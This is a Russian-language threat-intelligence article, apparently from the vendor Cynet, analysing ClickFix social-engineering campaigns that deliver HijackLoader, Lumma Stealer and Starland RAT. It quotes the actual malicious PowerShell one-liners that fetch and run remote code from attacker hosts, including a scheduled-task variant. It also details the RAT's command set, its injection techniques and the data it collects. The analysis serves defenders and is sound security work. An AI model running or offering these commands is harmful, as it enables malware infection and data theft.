- Краткий обзор
- Изменение тенденций в социальной инженерии: от скрытой компрометации к обязательному взаимодействию с пользователем
- Экспансия ClickFix
- HijackLoader развертывает Lumma Stealer через вредоносные файлы MSI
- Начальный доступ
- Выполнение
- Уклонение от защиты
- Управление и контроль
- Starland RAT – новая цепь компрометации и новые команды
- Начальный доступ
- Выполнение
- Уклонение от защиты
- Управление и контроль
- Закрепление в системе и сбор информации
- Что дальше?
- XDR платформа Cynet
Краткий обзор
В последние годы атаки ClickFix стали неотъемлемой частью социальной инженерии. Эта тактика оказалась настолько успешной, что эволюционировала в новую атаку под названием ConsentFix, которая позволяет злоумышленникам похищать токены облачных учетных записей. Как и ожидалось, методы таких атак продолжают адаптироваться по мере того, как растет их узнаваемость и частота обнаружения командами защиты.
Компания Cynet зафиксировала несколько угроз, которые злоупотребляли волной атак ClickFix, в частности HijackLoader и Starland RAT, использующий технику Etherhiding для получения URL-адресов серверов C&C. Кампания HijackLoader наблюдалась в больших объемах как во внутренней телеметрии, так и в открытых источниках (OSINT). Традиционно для HijackLoader, в ней злоупотребляли вредоносными командами PowerShell из атаки ClickFix, которые загружали файл MSI, содержащий сам загрузчик. Новая версия Starland RAT устанавливалась через атаку ClickFix, которая создавала запланированную задачу для запуска вредоносной команды PowerShell. Она, в свою очередь, выполняла вредоносный байт-код Python, который соединялся с C&C для получения дальнейших инструкций.
В этой статье подробно рассматриваются две такие кампании, которые Cynet обнаружила в реальных условиях: масштабная операция HijackLoader, скрывавшаяся за троянизированными инсталляторами MSI, и более скрытая кампания Starland RAT, получающая свой адрес C&C непосредственно из блокчейна Ethereum. Даже такая простая техника, как «скопировать и вставить», сочетается со все более сложными методами уклонения – от подгрузки вредоносных компонентов через легитимные исполняемые файлы (legitimate-binary sideloading) до определения серверов C&C на базе блокчейна. Соответственно, специалистам по кибербезопасности нужно рассматривать угрозу ClickFix гораздо шире, чем просто как метод доставки вредоносного ПО.
Изменение тенденций в социальной инженерии: от скрытой компрометации к обязательному взаимодействию с пользователем
Еще каких-то десять лет назад уязвимости в Internet Explorer, Chrome и Adobe Flash эксплуатировались массово и повсеместно. Наборы эксплойтов, такие как Rig и Angler EK, тогда безоговорочно доминировали – именно на них приходилась значительная доля всех случаев компрометации систем вредоносным ПО. Секрет их успеха заключался в способности автоматически определять версию браузера или Flash у объекта атаки, запускать соответствующий код эксплойта и успешно выполнять вредоносное программное обеспечение на его компьютере. При этом от самой цели не требовалось никаких действий – ни загрузки файлов, ни двойного клика по полезной нагрузке.
Эти так называемые drive-by атаки были чрезвычайно эффективными, поскольку требовали минимального вмешательства пользователя, что является крайне желательной характеристикой для любого вектора компрометации.
Какое-то время казалось, что социальная инженерия уходит в прошлое, а будущее начального доступа принадлежит эксплойтам для браузеров. Злоумышленникам больше не нужно было никого обманывать – наборы эксплойтов могли автоматически выполнять их задачи с помощью вредоносного JavaScript, встроенного в скомпрометированные веб-сайты. Однако, когда эта модель масштабной и скрытой эксплуатации стала все менее жизнеспособной, экосистема программного обеспечения начала действовать в ответ.
Разработчики браузеров усилили защиту своего ПО
Компания Adobe объявила о прекращении поддержки Flash, и в последующие годы наборы эксплойтов становились все менее актуальными. Мечта злоумышленников об автоматической компрометации целевых устройств подошла к концу. Как следствие, социальная инженерия продолжила играть ключевую роль в ландшафте киберугроз, поскольку люди до сих пор остаются самым слабым звеном.
По мере того как эксплуатация через браузеры шла на спад, злоумышленники все чаще возвращались к методам, требовавшим взаимодействия с пользователем, а не скрытой компрометации. Со временем макросы Office временно вернули свои позиции, поскольку нападавшие находили креативные способы обманом заставить пользователей их включить. Однако в 2022 году компания Microsoft приняла важное решение, повлекшее значительный сдвиг в ландшафте угроз – макросы для документов Office, загруженных из интернета, начали отключаться по умолчанию. Макросы снова стали менее распространенными, когда злоумышленники перешли на другие методы доставки. Среди них – файлы LNK, образы ISO для обхода механизма Mark of the Web (MotW) и даже старый трюк с двойным расширением, который заставлял пользователей думать, что они открывают файл .docx, тогда как на самом деле запускался .exe. Эти техники и дальше полагались на обман, часто создавая ощущение срочности вокруг таких вещей, как неожиданный инвойс или банковский перевод. Тем не менее общая тенденция была очевидной: когда технические пути для атак сужались, злоумышленники продолжали находить новые способы заставить пользователя выполнить критически важное действие. А что, если бы этот шаг можно было подать не как открытие файла, а как исправление технической ошибки?
Экспансия ClickFix
В течение последних нескольких лет в ландшафте угроз стремительно появилась новая техника, получившая название ClickFix. В отчете, опубликованном в прошлом году, компания Microsoft отметила, что 47% зафиксированных ею методов начального доступа приходились на ClickFix, что вывело этот подход вперед по сравнению с такими проверенными временем векторами, как фишинг. Суть метода очень проста: люди постоянно проходят проверки CAPTCHA на различных веб-сайтах, особенно в эпоху искусственного интеллекта, когда боты встречаются повсюду. Так почему бы не сделать фальшивую CAPTCHA, которая копирует вредоносную команду в буфер обмена и просит пользователя нажать несколько клавиш? Это требует минимум усилий как от злоумышленника, так и от самого пользователя, что, вероятно, и стало залогом такого успеха. Кампании ClickFix начинаются как бесфайловые и выглядят как настоящие действия пользователя. Более того, недавнее исследование Cynet продемонстрировало, как атаки в стиле ClickFix могут привести к получению злоумышленником прямого доступа к управлению (hands-on-keyboard) за считанные минуты. Это ярко подчеркивает, насколько быстро такие, казалось бы, простые взаимодействия способны перерасти в полную компрометацию.
Этот же сценарий с копированием и вставкой оказался настолько эффективным, что злоумышленники быстро начали применять его за пределами традиционной доставки вредоносного ПО
Вместо того чтобы использовать фальшивое «исправление» для запуска полезной нагрузки, они адаптировали эту технику для захвата облачных учетных записей. Именно здесь и появляется ConsentFix, также известная как AuthCodeFix. Эти атаки часто начинаются с отравления поисковой выдачи (SEO poisoning) или вредоносной рекламы, ведущей пользователя на целевую страницу с запросом на аутентификацию в учетной записи Microsoft. Когда пользователь нажимает кнопку аутентификации, открывается настоящая страница входа Microsoft, из-за чего процесс выглядит легитимным. Однако впоследствии процесс авторизации завершается ошибкой, и именно здесь в игру вступает «исправление»: пользователю дают указание скопировать URL-адрес неудачного перенаправления, который часто указывает на несуществующий адрес localhost, обратно на вредоносный веб-сайт. Этот URL-адрес содержит код авторизации OAuth, который злоумышленники могут обменять на токены и использовать для доступа к учетной записи Microsoft атакованного пользователя. Получив доступ, они могут проводить разведку среды, компрометировать корпоративную почту и осуществлять дополнительную вредоносную деятельность – и все это без единого скачивания вредоносного ПО на целевое устройство.
Хотя ConsentFix еще не достигла таких масштабов, как ClickFix, на русскоязычном хакерском форуме XSS уже доступен инструментарий для развертывания этой атаки.
Хронология ключевых событий ClickFix
Октябрь 2023
Появление
ClickFix распространяется через поддельные антибот-страницы. Пользователей обманом заставляют запускать PowerShell. Истоки техники связаны с ClearFake и EtherHiding.
Март–апрель 2024
Появление названия и масштабирование
Proofpoint отслеживает волны атак TA571 и ClearFake.
Перехват буфера обмена и самостоятельное выполнение команд пользователем.
Появляется термин «ClickFix».
Май–сентябрь 2024
Использование киберпреступниками
Техника распространяется среди киберпреступников.
Lumma Stealer доминирует в кампаниях.
Вредоносная реклама и поддельные CAPTCHA позволяют масштабировать распространение.
Октябрь 2024 – февраль 2025
Использование APT-группами
APT28, MuddyWater и Kimsuky начинают применять этот метод.
Расширение его использования в шпионских операциях свидетельствует о зрелости техники.
Первое полугодие 2025
Широкомасштабное влияние
Один из ведущих в мире векторов начального доступа.
Около 8% заблокированных атак.
47% оповещений Defender IR.
Конец 2024–2025
Коммерциализация
Готовые наборы для создания атак продаются на подпольных площадках за $200–$1,5 тыс. в месяц.
Вариант FileFix переходит к выполнению через Проводник Windows.
Декабрь 2025
ConsentFix
Push Security вводит название «ConsentFix».
Перехват предоставления OAuth-разрешений через Azure CLI.
Позволяет обходить защиту на основе паролей, MFA и ключей доступа (passkeys).
Большинство современных целевых страниц ClickFix эксплуатируют именно эту потребность в знакомых интерфейсах, маскируясь под страницы Cloudflare или reCAPTCHA, чтобы выглядеть подлинными для неосмотрительных пользователей. Приведенные ниже примеры демонстрируют распространенные шаблоны страниц ClickFix, обнаруженные во время недавних кампаний.


Cynet сталкивался с несколькими кампаниями ClickFix, которые пытались проникнуть в инфраструктуру клиентов. Поскольку объемы и разнообразие таких кампаний продолжают расти, ClickFix стал важным направлением для изучения этой техники и помощи в защите пользователей от подобных атак. В этой статье рассматриваются две кампании, которые удалось обнаружить: кампания HijackLoader, характеризовавшаяся резким всплеском активности, и более скрытая кампания ClickFix, которая устанавливала RAT на базе Python.
HijackLoader развертывает Lumma Stealer через вредоносные файлы MSI
Как подготовленный скрипт PowerShell доставляет вредоносный файл MSI и выполняет скрыто загруженные компоненты.

Начальный доступ и подготовка
Запуск через ClickFix и PowerShell
Доставка полезной нагрузки
Декодирование скрипта и доставка вредоносного файла MSI
Подмена DLL и выполнение
Загрузка DLL и выполнение финальных компонентов
В апреле компания Cynet обнаружила кампанию HijackLoader на базе ClickFix, которая развертывала Lumma Stealer через вредоносные файлы MSI. Эти инсталляторы MSI содержали легитимные, безопасные исполняемые файлы – например, бесплатную утилиту SysInspector от ESET, – скрывая вредоносное ПО в DLL-библиотеке, которая подгружалась подписанным исполняемым файлом ESET. Было замечено, что в этой кампании использовалось несколько вариаций похожих команд ClickFix, которые применяли легкие загрузчики PowerShell для инициализации следующих этапов. В некоторых вариантах злоумышленники добавляли к командам фальшивые комментарии, чтобы заставить пользователей поверить, будто они следуют инструкциям настоящей проверки CAPTCHA.
Начальный доступ
Как и в других атаках ClickFix, эта цепь атаки начиналась с того, что пользователю показывали мошенническую веб-страницу с указанием выполнить команду на своем устройстве для исправления ошибки. Судя по идентификатору RAY-ID в команде, страница, вероятно, маскировалась под Cloudflare, чтобы запрос выглядел вполне безопасным для неосмотрительного пользователя.
Затем пользователь открывал окно «Выполнить» и вводил предоставленную команду. Следующая команда PowerShell была зафиксирована в инфраструктуре нескольких клиентов в апреле:
iex(irm 85[.]11[.]161[.]198:9191 -UseBasicParsing) # RAY-ID:735428-SGTP5; Anti-bot autodetection
Хотя нет доступа к оригинальному сайту, который был источником этой конкретной компрометации, обнаружены другие сайты ClickFix. Они распространяли похожую команду, использовали общую инфраструктуру и отдавали похожий файл MSI.

Выполнение
Приведенная выше команда загружала объемный скрипт PowerShell с hXXp[://]85[.]11[.]161[.]198:9191/ с помощью командлета Invoke-RestMethod и выполняла его непосредственно в памяти, используя Invoke-Expression. После запуска, на следующем этапе, дополнительный код PowerShell, закодированный в формате Base64, записывался в файл PS1 и сразу выполнялся. Это был последний этап с использованием PowerShell в цепи компрометации. Его задачей было загрузить файл с сервера C&C, который, судя по коду, мог быть в формате .exe или .msi. В этой конкретной цепи компрометации зафиксирована загрузка именно файла MSI.
Файл MSI устанавливался в скрытом режиме с использованием флага /qn, чтобы гарантировать отсутствие какого-либо интерфейса пользователя (UI), после чего установленное программное обеспечение немедленно запускалось. В этом случае наблюдалось, как файл MSI инсталлировал утилиту SysInspector от ESET под названием Celerity-Monitor.exe, а вместе с ней – вредоносную библиотеку DLL sciter-x.dll, которую затем загружал файл Celerity-Monitor.exe.
Уклонение от защиты
Загруженный скрипт содержал много безопасного «мусорного» кода (junk code), чтобы скрыть свои истинные намерения. Однако этот код постоянно повторялся, что позволило легко обнаружить настоящий вредоносный код, который был закодирован в формате Base64 в переменной $data. В отличие от большинства стейджеров PowerShell, в том числе и тех, что использовались на предыдущих этапах этой цепи компрометации, этот скрипт применил объект COM для загрузки файла MSI. Во многих атаках с использованием файлов MSI злоумышленники могут злоупотреблять функцией в msiexec.exe, которая позволяет напрямую передавать URL-адрес к удаленному файлу MSI. Но в этом случае нападавшие решили загрузить файл самостоятельно, использовав менее распространенный в PowerShell метод – вероятно, чтобы избежать обнаружения.

Файл sciter-x.dll, похоже, изначально был официальной библиотекой DLL, которую пропатчили для чтения файла под названием filter-config.tmp. Библиотека расшифровывала этот файл, считывала из него название оригинальной библиотеки DLL для загрузки – в данном случае это был файл tapisrv.dll – загружала эту DLL в память, перезаписывала ее память шеллкодом (shellcode), расшифрованным из файла, и передавала ему выполнение. Такая техника способна обходить определенные механизмы обнаружения систем EDR (Endpoint Detection and Response), поскольку выполнение шеллкода происходит в пространстве памяти действительного модуля, а не путем выделения новых приватных регионов памяти.

Управление и контроль
После запуска шеллкода на диск было сохранено и запущено еще несколько исполняемых файлов, в частности:
AppData\Roaming\winrepository_v2_0\Crisp.exe
и
AppData\Local\Temp\EXEMessenger_net40.exe
После выполнения файл EXEMessenger_net40.exe попытался установить обратное соединение с IP-адресом 91[.]84[.]123[.]231, но на момент анализа сервер уже не отвечал. Он также неоднократно отправлял запросы HTTP HEAD к http://example.com – вероятно, чтобы помочь реальному трафику C&C слиться с безопасным трафиком.
Starland RAT – новая цепь компрометации и новые команды
Как подготовительные этапы ClickFix приводят к выполнению PowerShell, поиску C&C через блокчейн и получению команд злоумышленника.

Начальный доступ и подготовка
Установка точки входа и закрепление
Выполнение PowerShell
Загрузка подготовленного скрипта и развертывание RAT
Управление и контроль
Определение адреса URL C&C и ожидание команд
В отличие от предыдущей кампании, которая выглядела масштабной и имела большое количество образцов в реальных условиях (in the wild), эта кампания была значительно менее заметной и фиксировалась только в инфраструктуре одного клиента, в конечном итоге устанавливая Starland RAT на целевое устройство. Злоумышленник обманом заставлял пользователя выполнить команду, которая создавала запланированную задачу. Эта задача, в свою очередь, загружала и устанавливала вредоносный программный компонент на базе Python на устройство пользователя. Вредоносное ПО получало свой настоящий URL-адрес сервера C&C из блокчейна Ethereum, используя технику под названием EtherHiding.
Cynet впервые зафиксировала эту активность в инфраструктуре клиента еще в мае 2026 года, до публикации соответствующего отчета от Cisco. Исследованная версия Starland RAT, похоже, содержит дополнительные команды, отсутствующие в образце, который анализировала Cisco.
Начальный доступ
По данным телеметрии, атака началась с команды, введенной через окно «Выполнить» в Windows. Сначала ее обнаружили благодаря телеметрии реестра RunMRU, которая фиксирует команды, недавно выполненные через окно «Выполнить», в ветке HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. В этом случае команда не запускала загрузчик PowerShell как прямой дочерний процесс explorer.exe. Вместо этого она создавала запланированную задачу, которая запускалась ежеминутно и выполняла загрузчик PowerShell уже оттуда – вероятно, чтобы помочь злоумышленникам избежать механизмов обнаружения, нацеленных на процессы PowerShell, порождаемые непосредственно от explorer.exe. Вот зафиксированная команда, введенная в окне «Выполнить»:
schtasks /create /tr "powershell -C \"iex(irm 39e552145a32ab0a[.]fun/88c9b4d0fd9a9d0033d3757cde345302)\"" /sc minute /mo 1 /tn "Enter"
Выполнение
После запуска запланированной задачи она выполнила файл PS1 из директории AppData\Local\Temp. Затем этот скрипт запустил закодированную в формате Base64 команду PowerShell, которая пыталась загрузить следующий этап. На последнем этапе с использованием PowerShell загружался файл ZIP, содержащий проект Python, вместе с собственным интерпретатором Python и файлом .pyc под названием LICENSE.txt.

Уклонение от защиты
Этапы с использованием PowerShell для загрузки файла ZIP применяли относительно простые формы обфускации, такие как запись строк в обратном порядке и конкатенацию строк, чтобы скрыть подозрительные фрагменты команд. Конечное полезное выполнение, LICENSE.txt, оказалось сильно запутанным файлом PYC со сложной схемой сокрытия строк и имен. Байт-код удалось декомпилировать с помощью PyLingual и выполнить дополнительные скрипты для расшифровки строк, зашифрованных по алгоритму XOR с несколькими разными ключами. Анализ восстановленного исходного кода выявил очень интересный функционал: полезная нагрузка оказалась кастомным RAT-трояном, использовавшим сложную технику под названием EtherHiding, при которой вредоносное ПО получало свой URL-адрес сервера C&C из блокчейна Ethereum. Сохраняя истинное расположение сервера C&C таким образом, злоумышленники усложнили идентификацию активного сервера постфактум. Этот RAT выполнял задания, используя метод eth_call через конечные точки Polygon RPC для получения скрытого URL-адреса полезной нагрузки.

Управление и контроль
После получения скрытого URL-адреса сервера C&C RAT запускался и собирал информацию о текущей среде перед ее отправкой на сервер C&C, где ожидал дальнейших инструкций. Изначально собранная информация помещалась в файл JSON формата:
{
"build_id": "captcha",
"payload_version": "5.1",
"pc_id": machine_guid,
"windows_version": windows_version,
"machine_name": machine_name,
"username": user_name,
"av": av,
"domain": domain,
"can_elevate": not is_admin() and is_limited_token(),
"screen": screenshot_in_base64
}
Этот файл JSON содержал GUID устройства, полученный из реестра, версию Windows, имя хоста, имя пользователя, установленные антивирусные продукты, домен, информацию о возможности пользователя повысить привилегии, а также скриншот экрана хоста в формате PNG, закодированный в Base64. После отправки этой информации RAT ожидал команд. Ниже приведен список команд, которые принимает это вредоносное ПО – он содержит несколько дополнительных команд по сравнению с теми, о которых ранее сообщала компания Cisco:
Набор команд Starland RAT
| Команда | Описание |
| shellexecute | Выполняет команду, полученную с сервера C&C. |
| x32 | Внедряет 32-битный шеллкод в dpapimig.exe с помощью стандартных функций VirtualAllocEx + WriteProcessMemory + QueueUserAPC. |
| x32_v2 | Внедряет 32-битный шеллкод в prevhost.exe с помощью техники Early Bird injection с использованием QueueUserAPC. |
| x32_v3 | Внедряет 32-битный шеллкод в efsui.exe с помощью функций Nt + QueueUserAPC. |
| x32_v4 | Внедряет 32-битный шеллкод в systray.exe с помощью VirtualAllocEx + функций Nt для записи/защиты и QueueUserAPC. |
| x64 | Повторно запускает 64-битную версию кода с аргументом, указывающим на версию внедрения шеллкода, которую следует использовать. |
| x64_2 | Повторно запускает 64-битную версию кода с аргументом, указывающим на версию внедрения шеллкода, которую следует использовать. |
| x64_3 | Повторно запускает 64-битную версию кода с аргументом, указывающим на версию внедрения шеллкода, которую следует использовать. |
| x64_4 | Повторно запускает 64-битную версию кода с аргументом, указывающим на версию внедрения шеллкода, которую следует использовать. |
| download | Загружает файл с сервера C&C. Если это файл EXE, он запускается. Если это файл MSI, он устанавливается в скрытом режиме. Если это файл DLL, для его запуска используется команда regsvr32 /s. Если это файл ZIP, он распаковывается. Файлы загружаются в директорию %TMP%. |
| elevate | Пытается запустить RAT с правами администратора путем вызова UAC. В случае неудачи попытка повторяется. |
| interactive_start | Открывает интерактивную оболочку (shell) с возможностью выбора cmd или PowerShell. |
| botinfo | Собирает информацию о хосте через WMI, Windows API, реестр и другие команды. Эта информация включает общие сведения о системе, дисковые накопители, облачные хранилища, расширения браузера, установленное программное обеспечение и настройки безопасности. |
| screenshot | Делает скриншот экрана хоста и сохраняет его в файл PNG. |
Закрепление в системе и сбор информации
После выполнения Cynet зафиксировала многочисленные команды закрепления и разведки, инициированные процессом pythonw.exe. Сначала вредоносное ПО создавало файл LNK в директории автозагрузки (startup), который запускал pythonw.exe с файлом LICENSE.txt. Затем создавалась новая запланированная задача под названием MSIAfterInstall_7861 для запуска LICENSE.txt во время входа в систему. После настройки нескольких методов закрепления вредоносное ПО делало скриншот экрана и собирало множество данных из системы, в частности:
- установленные антивирусные продукты;
- домен;
- результаты выполнения systeminfo.exe;
- текущий пользователь и информация о нем, полученная через команду net user;
- системная информация из классов Win32_ComputerSystem, Win32_Processor, Win32_OperatingSystem и Win32_ShadowCopy;
- любая информация о точках восстановления компьютера;
- установленное программное обеспечение (согласно списку программ для удаления в реестре);
- сетевая информация (IP и MAC адреса);
- профили и настройки фаервола;
- активирован ли параметр EnableLUA в реестре;
- статус Windows Defender на устройстве.

Что дальше?
Становится очевидным, как ClickFix быстро захватил современный ландшафт угроз благодаря своей простоте и эффективности. Это вполне логично: в интернете пользователей постоянно просят подтвердить, что они люди. Проверки CAPTCHA стали настолько привычным явлением, что пользователи часто выполняют их не задумываясь. Сегодня механизмы CAPTCHA постоянно меняются и усложняются, поскольку боты на базе искусственного интеллекта массово сканируют веб-страницы. Вполне вероятно, что пользователь может нажать несколько клавиш на клавиатуре, чтобы преодолеть то, что кажется ему просто раздражающим препятствием. Факт остается фактом: угроза ClickFix, вероятно, будет оставаться актуальной как минимум еще какое-то время.
Чтобы лучше защититься от атак ClickFix, прежде всего необходимо повышать осведомленность пользователей о них. Обучение по противодействию фишингу уже является устоявшейся практикой; многие компании используют его, чтобы научить сотрудников распознавать попытки фишинга до того, как они превратятся в дорогостоящие инциденты безопасности. Аналогично, обучение пользователей распознавать аномальное поведение CAPTCHA – например, указания выполнить команды в своей системе – может помочь предотвратить эти атаки на уровне человеческого фактора. Однако специалистам по защите также следует избегать восприятия ClickFix исключительно как проблемы, связанной с вредоносным программным обеспечением. Такие техники, как ConsentFix, демонстрируют, что злоумышленники могут применять те же принципы социальной инженерии для атак на идентификационные данные в облаке, что позволяет им получать токены доступа без выполнения какого-либо кода на целевом устройстве. Поскольку организации продолжают переносить рабочие нагрузки в решения SaaS и облачные платформы, командам по безопасности следует готовиться к атакам в стиле ClickFix, которые нацелены на идентификационные данные так же агрессивно, как и на конечные точки.
XDR платформа Cynet
Cynet объединяет EDR, EPP, NDR, ITDR, SOAR, безопасность электронной почты, защиту SaaS и облачных сред, мобильную безопасность и другие возможности безопасности в единой унифицированной платформе. Платформа обеспечивает комплексную видимость и защиту всей среды, может быть развернута за считанные часы, а не недели, автоматизирует рутинные задачи по безопасности для уменьшения доли ручного труда, а также использует встроенный ИИ для минимизации ложных срабатываний и ускорения обнаружения угроз и реагирования на них.







